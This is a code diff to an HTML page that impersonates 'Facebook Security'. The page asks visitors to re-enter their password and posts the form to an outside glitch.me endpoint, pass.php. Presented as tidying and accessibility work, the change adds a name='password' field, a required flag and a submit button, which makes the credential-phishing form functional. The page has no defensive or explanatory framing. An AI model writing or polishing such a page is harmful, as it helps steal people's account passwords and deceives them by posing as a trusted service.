--- a/index.html
+++ b/index.html
@@ -64,15 +64,15 @@
   </style>
 </head>
 <body>
-     <form class="content" action="https://muddy-rain-birth.glitch.me/pass.php" method="POST">
-         
-  <div class="passwordContainer">
-    <img src="https://cdn.glitch.global/c8a0e925-2286-42f9-bc9a-4154a9091edd/3357701.webp?v=1724180745555" alt="Logo">
-    <h3>Facebook Security</h3>
-    <p>Please re-enter password to complete the request.</p>
-    <input type="password" placeholder="Password">
-    
-    <button>Submit</button>
-  </div>
+  <form class="content" action="https://muddy-rain-birth.glitch.me/pass.php" method="POST">
+    <div class="passwordContainer">
+      <img src="https://cdn.glitch.global/c8a0e925-2286-42f9-bc9a-4154a9091edd/3357701.webp?v=1724180745555" alt="Logo">
+      <h3>Facebook Security</h3>
+      <p>Please re-enter password to complete the request.</p>
+      <label for="password" class="sr-only">Password</label>
+      <input type="password" name="password" id="password" placeholder="Password" aria-label="Password" required>
+      <button type="submit">Submit</button>
+    </div>
+  </form>
 </body>
 </html>
